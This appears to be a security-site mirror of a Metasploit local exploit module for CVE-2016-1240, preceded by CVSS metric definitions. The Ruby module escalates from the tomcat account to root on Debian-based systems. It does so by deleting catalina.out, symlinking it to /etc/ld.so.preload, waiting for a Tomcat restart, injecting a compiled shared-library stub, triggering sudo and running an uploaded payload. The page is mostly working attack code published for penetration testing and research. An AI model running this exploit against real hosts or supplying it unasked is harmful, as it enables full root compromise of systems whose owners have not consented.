The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Apache Tomcat On Ubuntu Log Init Privilege Escalation
###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in a command on a linux computer for priv esc.
#
###
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::Retry
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::Linux::Compile
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Tomcat on Ubuntu Log Init Privilege Escalation',
'Description' => %q{
Tomcat (6, 7, 8) packages provided by default repositories on Debian-based
distributions (including Debian, Ubuntu etc.) provide a vulnerable
tomcat init script that allows local attackers who have already gained access
to the tomcat account (for example, by exploiting an RCE vulnerability
in a java web application hosted on Tomcat, uploading a webshell etc.) to
escalate their privileges from tomcat user to root and fully compromise the
target system.
Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Dawid Golunski <[email protected]>' # original PoC, analysis, discovery
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PYTHON ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'DefaultOptions' => {
'PrependFork' => true,
'WfsDelay' => 1800 # 30min
},
'References' => [
[ 'EDB', '40450' ],
[ 'URL', 'https://ubuntu.com/security/notices/USN-3081-1'],
[ 'URL', 'http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html'],
[ 'CVE', '2016-1240']
],
'DisclosureDate' => '2016-09-30',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
}
)
)
register_options [
OptString.new('CATALINA', [ true, 'Location of catalina.out file', '/var/log/tomcat8/catalina.out' ])
]
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def base_dir
datastore['WritableDir'].to_s
end
def preload
'/etc/ld.so.preload'
end
def catalina
datastore['CATALINA']
end
def check
package = cmd_exec('dpkg -l tomcat[6-8] | grep \'^i\'')
if package.nil? || package.empty?
return CheckCode::Safe('Unable to execute command to determine installed pacakges')
end
package = package.gsub('\s+', ' ') # replace whitespace with space so we can split easy
package = package.split(' ')
# 0 is ii for installed
# 1 is tomcat# for package name
# 2 is version number
package = Rex::Version.new(package[2])
if (package.to_s.start_with?('8') && package < Rex::Version.new('8.0.32-1ubuntu1.2')) ||
(package.to_s.start_with?('7') && package < Rex::Version.new('7.0.52-1ubuntu0.7')) ||
(package.to_s.start_with?('6') && package < Rex::Version.new('6.0.35-1ubuntu3.8'))
return CheckCode::Appears("Vulnerable app version detected: #{package}")
end
CheckCode::Safe("Unexploitable tomcat packages found: #{package}")
end
def exploit
# Check if we're already root
if is_root? && !datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
unless file? catalina
fail_with Failure::BadConfig, "#{catalina} not found or still symlinked"
end
if file? preload
fail_with Failure::BadConfig, "#{preload} found, check file as it needs to be removed for exploitation"
end
vprint_status("Creating backup of #{catalina}")
@catalina_content = read_file(catalina)
path = store_loot(
catalina,
'text/plain',
rhost,
@catalina_content,
'catalina.out'
)
print_good("Original #{catalina} backed up to #{path}")
if live_compile?
# upload our privesc stub
so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
so_stub_path = "#{base_dir}/#{so_stub}"
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
# Upload exploit stub
vprint_status "Compiling exploit stub: #{so_stub_path}"
upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
else
payload_path = '/tmp/.jMeY5vToQl'
so_stub = '.ny9NyKEPJ.so'
so_stub_path = "/tmp/#{so_stub}"
write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
end
register_file_for_cleanup(so_stub_path)
# Upload payload executable
vprint_status("Uploading Payload to #{payload_path}")
upload_and_chmodx payload_path, generate_payload_exe
register_file_for_cleanup(payload_path)
# delete the log and symlink ld.so.preload
vprint_status("Deleting #{catalina}")
rm_f(catalina)
vprint_status("Creating symlink from #{preload} to #{catalina}")
cmd_exec("ln -s #{preload} #{catalina}")
register_file_for_cleanup(catalina)
# we now need tomcat to restart
print_good("Waiting #{datastore['WfsDelay']} seconds on tomcat to re-open the logs aka a Tomcat service restart")
succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do
file? preload
end
unless succeeded
print_error("#{preload} not found, exploit aborted")
return
end
register_file_for_cleanup(preload)
# now that we can write to ld.so.preload, use a SUID binary to execute our stub
print_status("injecting #{so_stub_path} into #{preload}")
cmd_exec "echo #{so_stub_path} > #{preload}"
print_status('Escalating payload privileges via SUID binary (sudo)')
cmd_exec 'sudo --help 2>/dev/null >/dev/null'
print_status('Executing payload')
cmd_exec payload_path
end
def cleanup
if @catalina_content.nil?
cmd_exec("touch #{catalina}")
else
write_file(catalina, @catalina_content)
end
super
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum